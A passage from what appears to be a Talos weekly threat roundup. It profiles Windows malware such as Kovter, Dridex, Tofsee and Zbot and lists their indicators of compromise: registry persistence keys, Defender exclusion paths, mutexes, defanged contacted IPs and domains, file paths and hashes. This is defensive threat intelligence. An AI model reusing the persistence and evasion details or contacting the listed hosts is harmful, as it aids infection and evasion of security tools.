Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 7 and May 14. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threatsbubl in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Trojan.Kovter-9858829-1 Trojan Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. It's capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.Dridex-9860519-0 Dropper Dridex is a well-known banking trojan that steals credentials and other sensitive information from an infected machine.
Win.Dropper.Tofsee-9859251-0 Dropper Tofsee is multi-purpose malware that features several modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Packed.Zbot-9860904-0 Packed Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods including key-logging and form-grabbing.
Win.Packed.Razy-9859337-0 Packed Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Dropper.CoinMiner-9859396-1 Dropper This malware installs and executes cryptocurrency-mining software. You can read more about this kind of threat on our blog /blocking-cryptomining.
Win.Packed.ZeroAccess-9859480-1 Packed ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click-fraud campaigns.
Win.Malware.Zegost-9860024-0 Malware Zegost is a remote access trojan designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. Zegost appears to be derived from Gh0stRAT, which is a well-known remote access trojan that had its source code leaked, thus significantly lowering the barrier to entry for actors looking to modify and reuse the code in new attacks.
Win.Trojan.Bublik-9859726-1 Trojan Bublik is a downloader that targets Windows hosts. Although it's primarily used as malware to distribute various banking trojans, it's also capable of extracting and exfiltrating sensitive information from the host.

Threat Breakdown

Win.Trojan.Kovter-9858829-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE
Value Name: DisableOSUpgrade
25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE
Value Name: ReservationsAllowed
25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0521341d
25
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0521341d
25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: b5e001e3
25
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: b5e001e3
25
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE 25
<HKCU>\SOFTWARE\FC6A75BE78 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 25
<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78
Value Name: 0905afc0
23
<HKCU>\SOFTWARE\FC6A75BE78
Value Name: 0905afc0
23
<HKLM>\SOFTWARE\WOW6432NODE\76D3A2679688FA8837 1
<HKLM>\SOFTWARE\WOW6432NODE\2D12CE176E09BA21A8A 1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL 1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB 1
<HKLM>\SOFTWARE\WOW6432NODE\76D3A2679688FA8837
Value Name: D6E3FB49B9701B7CE4
1
<HKLM>\SOFTWARE\WOW6432NODE\L8SCBGDRZV
Value Name: 2iE6FL4UAl
1
<HKLM>\SOFTWARE\WOW6432NODE\2D12CE176E09BA21A8A
Value Name: D1BE270470097E380
1
<HKLM>\SOFTWARE\WOW6432NODE\L8SCBGDRZV
Value Name: brQIDXb
1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL
Value Name: qHmRerek
1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB
Value Name: wuaQkvx9a
1
<HKLM>\SOFTWARE\WOW6432NODE\PQI0NHLLL
Value Name: lMXVogonlQ
1
<HKLM>\SOFTWARE\WOW6432NODE\I2M2UIB
Value Name: T0xuhWHOx
1
MutexesOccurrences
C59C87A31F74FB56 25
Global\42EDC1955FE17AD4 25
0D0D9BEBF5D08E7A 25
1315B41013857E19 25
B8ED4D143840045A 19
6DD7DBFFCEB24BFD 19
Global\CD5FF936B43684FB 19
BAD24FA07A7F6DD9 1
863D9F083B3F4EDA 1
Global\EE662FBC96CBCB1A 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
142[.]64[.]110[.]53 1
132[.]188[.]103[.]45 1
3[.]38[.]44[.]212 1
59[.]3[.]190[.]228 1
169[.]185[.]72[.]129 1
44[.]124[.]107[.]109 1
80[.]207[.]178[.]41 1
4[.]13[.]217[.]120 1
17[.]5[.]115[.]62 1
4[.]207[.]47[.]213 1
83[.]78[.]27[.]170 1
154[.]46[.]161[.]97 1
52[.]17[.]210[.]165 1
138[.]208[.]170[.]213 1
11[.]203[.]250[.]41 1
82[.]167[.]96[.]30 1
153[.]18[.]76[.]238 1
92[.]168[.]42[.]88 1
202[.]70[.]121[.]120 1
198[.]206[.]22[.]91 1
37[.]191[.]164[.]233 1
210[.]78[.]205[.]207 1
8[.]49[.]254[.]225 1
220[.]78[.]225[.]51 1
145[.]31[.]2[.]217 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
strongbody[.]com[.]mx 1

File Hashes

03097f69cb9f8fccc80a5e453935c21d5ff72352f5a11e8b54692b0aec2e0c14
085a916322814f7bbbadd3e101b684ee92cfa1af21965eef69e1b7ebc928f9ab
1037ae4e811b65b123727b4fc697e5379ecfd141a2cc63b1df9c020ef89a0ea1
1be6a76d54b6a32d6ca6e97b9e534356b3dc8ffe59ef8fe2d503b32fe3cd2822
2a8742f8d8ddf08047896fda8340daf7f0ed1f2cb2be0ebcd909be0db41d0d6c
2ff5831e823f51f355eaf53bd0c7f4fb62a753b670139795eed582dd76e144f3
3b3a707501cefa1872cd1901b1c66254c642377ce0c0777396c1365927ee3875
3c153e119d1cfbdb9f84aafb71b87096374137b20b4fd334d756f9468d9096d3
47d0777bdb64ba9211369b1d466d6b98b5e9bf52ec2dd922fd40e50c0ad04571
495673f730bf1fb7efc80eff6b562b1de801d5bbb190b855a72eff455aa744bf
50cc660eabfd2fb1c9a6bd9089addb5c43b1ccca389d762ac09a8a2d4ee606e7
5c1071b92825f2fde1b051ef284307c17c28d73b00f0e4fea5bc384a2e7f6cee
5df9a6810d6845af2dc4c7c3275cbeec2eda66944e89ea7029ea9fb39d68bc70
5e1b3b02dd43579d0acb60c19eb4358cfd01bba7d07f9bc3ee7f9b184b732eec
80c385e74fe1b254608c428b905e87d8d107059f18ee39b4cdd2b85bf716294d
8beaa60145d847cc03dea82f8d1a34d48b30de12960a57ae3dca285f830dc8f2
8c10fe2539220285bef7b0ae6a9d667bf7145dec21b8ab4777d5b26174043863
8f66757a404e39a9c537c6b6d7604d16f5baa7a85a2e9665ffc2982769536da8
91fc20ed9140d613e92e9a03c17af61024f76bfb00c76eb27a82c3c350905531
96469c3b4d6d80f84f1fa78cebe090366bae7a0f05441f8b759acd0ba8e0f3f7
9e9989736744a6dfefcbb45dedceaa0421dae036e34aa7931aafc603ebb549cb
a9eb5c5e4f44d979c04ba3d0040360402b8ba6f4cd0e899825db7f778a33cea4
b2a4fab4e7febf198d5ad7ed7066886a614b24c6f34edbd1c650a6b3259f6c1e
b3fb051435b918a273fabdc91d9eddec5f50bc56541a8091b578053c79147e9c
bdc65476081ace5ae1b66a2171859628ac4c3f51dc17933a68bb634d8a8ebdee

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Dridex-9860519-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963} 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963}\SHELLFOLDER 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{7E6AEF51-F5A7-48A0-B175-FE26B30A3B42} 15
MutexesOccurrences
{ac5b642b-c225-7367-a847-11bdf3a5e67c} 15
{24d07012-9955-711c-e323-1079ebcbe1f4} 15
{a2c9c140-d256-a4d5-6465-f62a6660f79e} 15
{a8af557b-6de9-c774-28f4-5c293f1b1769} 15
{b570fe85-587a-a133-ffc9-73821a57c0c1} 15
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5 15
%System32%\Tasks\Ryddmbivo 15
%APPDATA%\Microsoft\Excel\XLSTART\Lwu1Y 1
%APPDATA%\Microsoft\Excel\XLSTART\1QFT1 1
%APPDATA%\Microsoft\MSDN\aTjkyM0 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\7p5rxgT3 1
%APPDATA%\Microsoft\Excel\XLSTART\mcdbd 1
%APPDATA%\Microsoft\Excel\XLSTART\FQbmr 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\EVgWT3Uz 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\CEdWdqLx 1
%APPDATA%\Microsoft\MSDN\lGB2yKK 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\cdAWHUaL 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\hJLzFpa3 1
%APPDATA%\Microsoft\Windows\Recent\XJy9qz 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\6nGqJx2E 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\yJe3WnyY 1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\iZhGfiMe 1

File Hashes

0adc97b7e6c0e5a07c217ed07f3e4d2621378367898702af202ce423a4e44968
0b1a94e818ed5926979e3bf800d6ef6506cc454f3fbc971dc81f3dc09cbc6d4b
0e67ca5aba5951de50718199980b0c6cd9aea82fcd4df3a298a423bc5bbcb502
1c5e0371c112b5d506aab511bd22d2a9fc8d1645789ffa5f849c8e167d86d759
2d3314423a8e8540334b53fd8b3f86e3145fd1de9ccdf7578d65410b05e3fe92
50d4debec0b22ec3bf79e7981e151111d6c27a07fbbcf4f4736b40fe1a2fa368
557d9a6ced529bb08f4b5dffb6055242246d374b67fb6f9403bf5b75466851c2
5ee9feb5ba562ca43ab3bb2887f2b68ddc83a95824edc256760bf5b39247df2b
741aeb6540f86bcdf8afa4fe83d2c67801201adbb152fe4fc5ec4ec7a0a0e938
76e856ff4adf609eabac1060f16dc5b40b7ebf8aa5a1c14b7e29db73d81e5a3c
9686c9720fd75b3b5b67ba2691a632be47894711f12036fc1c6cd48fbb77e222
b62e248369e35cb03b53cfb16b8202737196df6058a6e993ee2d842563ed3e1b
cf421b526b380474d63db18490f3b2ff7ca80f200a9c1c4468e35ae9485aea78
ec52af4baef9d53dfe551403eade0e59cc522a084f8b0a5ffca4703a8913d194
f169743db89781bac952c17afda74a383a258d0bc5d43519e18d9bd78e6c17f4

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9859251-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 63 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
49
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
49
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
8
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {0B448A1A-A7ED-4CA4-8FD3-496E22C778AD}
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: {0B448A1A-A7ED-4CA4-8FD3-496E22C778AD}
5
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\lesyxfla
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\buionvbq
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mftzygmb
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
3
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\kdrxwekz
2
MutexesOccurrences
Global\<random guid> 5
YMyooCcSkKSRdwHNrGke 2
Dmrc_mtx_409a9db1-a045-4296-8d2c-9d71016c846b 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 49
217[.]172[.]179[.]54 49
144[.]76[.]108[.]82 49
212[.]22[.]87[.]191 49
51[.]178[.]207[.]67 49
195[.]242[.]110[.]99 49
157[.]240[.]18[.]174 46
87[.]251[.]71[.]150 46
91[.]203[.]5[.]144 43
172[.]217[.]10[.]228 34
37[.]1[.]217[.]172 21
104[.]47[.]53[.]36 19
172[.]217[.]10[.]35 18
23[.]5[.]227[.]69 17
40[.]113[.]200[.]201 15
23[.]64[.]99[.]87 14
23[.]5[.]238[.]94 13
172[.]217[.]12[.]164 12
89[.]39[.]105[.]12 12
142[.]250[.]64[.]99 12
40[.]76[.]4[.]15 11
104[.]47[.]54[.]36 11
67[.]195[.]204[.]72/31 11
163[.]172[.]32[.]74 11
142[.]250[.]80[.]3 10

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 49
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 49
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 49
249[.]5[.]55[.]69[.]in-addr[.]arpa 49
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 49
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 49
microsoft-com[.]mail[.]protection[.]outlook[.]com 49
microsoft[.]com 49
www[.]google[.]com 49
www[.]instagram[.]com 46
178[.]79[.]134[.]18[.]in-addr[.]arpa 23
234[.]172[.]168[.]18[.]in-addr[.]arpa 22
work[.]a-poster[.]info 21
mds[.]np[.]ac[.]playstation[.]net 14
www[.]google[.]com[.]au 13
native-ps3[.]np[.]ac[.]playstation[.]net 13
yabs[.]yandex[.]ru 13
www[.]bing[.]com 12
iv0001-npxs01001-00[.]auth[.]np[.]ac[.]playstation[.]net 12
www[.]google[.]ca 12
ip[.]pr-cy[.]hacklix[.]com 11
www[.]google[.]co[.]uk 10
i[.]instagram[.]com 9
www[.]google[.]ru 9
sso[.]godaddy[.]com 9

*See JSON for more IOCs

Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile 49
%SystemRoot%\SysWOW64\config\systemprofile:.repos 49
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 49
%TEMP%\<random, matching '[a-z]{8}'>.exe 48
%System32%\config\systemprofile:.repos 47
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 47
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10
%TEMP%\CC4F.tmp 5
%ProgramData%\{7C068637-88A8-4D31-BDD6-3DD62F336A77} 5
%ProgramData%\{7C068637-88A8-4D31-BDD6-3DD62F336A77}\11299.exe 5
%TEMP%\74442AADAF 5
%TEMP%\B91F1F35505F49E79F553176 5
%APPDATA%\medspolish 1
%APPDATA%\medspolish\dspolish.exe 1
%APPDATA%\medspolish\edspolish.exe 1
%APPDATA%\medspolish\geo.txt 1
%APPDATA%\medspolish\testoviyjukid.exe 1

File Hashes

036d119a798067ecceccfce377c4c9fe8b25f27d9e794ace27d6cb80bc491849
056ed0acbbaa373a3e621aad4ea825dbf78a3600c1b1aa3092b2d75386e407da
0ee70a8520c0d5642d2c5343138d2489d3581e98b9ceab931703e0afc2c7cb91
1a3c9b4b107e192117623fe8f2ec255816e2f60010f9f6c78c04a852998f91a3
22f53450bfff8d7a32def1d60002b2f3df8057fd4f24a3426c4ce721b280512d
2ac60069c2a182cdcfc4a518fcdc84439e94ecea7b7ebf5c9bc39eeff22dc05a
3e19970a7de7956ff17fe28f5bd461346eca33dc42818b3cf1a51d2c9246a4b6
409333819ffbedbde6f09534b6a1c7606ef2e5209756b93ad29b1e0ba05f5b5b
437b817c9207332cc2a4bc569e9d6d5fed38334ca49ab259cf8bcea44782619f
464a5706b3da57a88fdfbc03b103bb9521c4c91c6e913472ac5ec79381129eb8
4892fe9e3006491cdb90727e9c98d9525fbdf7a96e521c90dcb58e2f989ca2fa
4ba07524d6b760d409c8fdcfb3af1405d8a54625d00143c6b7650895cd7878dc
4c8e7e07dde63ff26534e7610145c8fe035ad136d5c56b0f37425dd79933dbd7
4ccab35fd40a59626da5f919bfbfda4c605f876d796765f4237e66f4d24646b9
4e92eec807db7be04f94e23b5eecfce5a190e548a77ff53c619a2ec1f1e4c9cd
4f1381dad42f78ef10b84ecc626dc57d2e9a60ca21ecd694e9dd018a26565965
5bda3e9a0c1707dd3b0331fbdb74d4579a4572b62cfb75274b1144eabaf63ce9
6125372b233dbe291402704712f0036c4fefec4b6bdc2524673a5a0f45877f7e
63489cbe625e3629c586d85525965440cdc09fd2d23c4c217cbf2dbfca94ae92
6694ed2a280a56c3537c3cb69598910c0e1480ea446eef49a6e1cf4337e29a92
671174c51f8389291b36ed2b28d38804abb648a53bd78dd7f4c3d03acedc0270
69d12e7bfc1403815230e85239a33a0caa3f5f5f448fccfdc8c09b2be9f3f768
6df9067d401e0eb0a830022ef2a0d1a0944721f6e204e8efe7f973eade3bc3d9
6e786edc0c52cdc24e5fce88143b8cd07c4bb495b5a9aac9d5803e52cff7734b
7a014792cf6755834ba55d5f7ac12142411227adf5835fb02c4e43cc6907d13b

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Zbot-9860904-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
Value Name: CleanCookies
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
5
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Evtaugwue
1
<HKCU>\SOFTWARE\MICROSOFT\ICDUU
Value Name: Romy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Numeo
1
<HKCU>\SOFTWARE\MICROSOFT\YMXIOV
Value Name: Uqmu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ymybemc
1
<HKCU>\SOFTWARE\MICROSOFT\YGLOQU
Value Name: Qiqiizy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Neymumazfy
1
<HKCU>\SOFTWARE\MICROSOFT\XAIZYV
Value Name: Wiumo
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Ebdypinuy
1
<HKCU>\SOFTWARE\MICROSOFT\AGPEO
Value Name: Ylottuiwy
1
MutexesOccurrences
Global\{2EB91635-A707-45F2-7F11-7CB911FD5787} 5
Global\{BBC299F0-28C2-D089-7F11-7CB911FD5787} 5
Local\{25674303-F231-4E2C-7F11-7CB911FD5787} 5
Local\{54D83047-8175-3F93-7F11-7CB911FD5787} 5
Local\{7943828F-33BD-1208-7F11-7CB911FD5787} 5
GLOBAL\{<random GUID>} 5
Local\{<random GUID>} 5
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
52[.]85[.]132[.]44 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
mfstroi[.]ru 5
Files and or directories createdOccurrences
%TEMP%\tmp<random, matching '[0-9a-z]{8}'>.bat 5
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 5
%APPDATA%\<random, matching '[A-Z][a-z]{3,5}\[a-z]{4,6}'>.exe 5
%APPDATA%\Zoyvwy\ikalz.fok 1
%APPDATA%\Rubu\mugo.miu 1
%APPDATA%\Egihna\ircux.pop 1
%APPDATA%\Ivziy\zaog.ezc 1
%APPDATA%\Qeex\zues.ytz 1
